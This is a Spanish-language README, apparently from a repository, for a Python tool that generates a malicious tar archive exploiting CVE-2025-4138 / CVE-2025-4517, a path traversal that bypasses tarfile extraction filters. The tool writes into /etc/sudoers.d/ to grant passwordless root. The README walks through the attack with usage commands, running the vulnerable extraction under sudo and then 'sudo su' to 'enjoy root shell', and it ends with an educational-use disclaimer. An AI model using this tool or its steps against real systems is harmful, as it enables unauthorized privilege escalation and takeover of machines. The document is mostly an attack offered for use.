
Un script de Python para generar un archivo tar malicioso que explota CVE-2025-4138 / CVE-2025-4517.
Un script de Python para generar un archivo tar malicioso que explota CVE-2025-4138 / CVE-2025-4517 (Recorrido de rutas mediante truncamiento de PATH_MAX).
Explotar con éxito esta vulnerabilidad permite a un atacante eludir los filtros de extracción de tarfile y escribir archivos arbitrarios en el sistema de archivos. Esta herramienta apunta específicamente a /etc/sudoers.d/ para otorgar privilegios de root sin contraseña.
Generar el payload del exploit:
python3 exploit.py -o exploit.tar
-o, --output: Requerido. La ruta para guardar el archivo tar malicioso.-u, --user: Opcional. El nombre de usuario objetivo al que otorgar privilegios sudo. Por defecto, el usuario actual que ejecuta el script.exploit.tar.
python3 exploit.py -o exploit.tar
exploit.tar a la máquina objetivo.sudo /usr/local/bin/python3 vulnerable.py -b exploit.tar -r restore_final
/etc/sudoers.d/<username>.
sudo su
# Enjoy root shell
Esta herramienta es solo para fines educativos e investigación de seguridad autorizada. El mal uso de este software viola la ley. El autor no se hace responsable por cualquier daño causado por el uso de esta herramienta.
CVE-2025-4138 Auto-Sudo por kyakei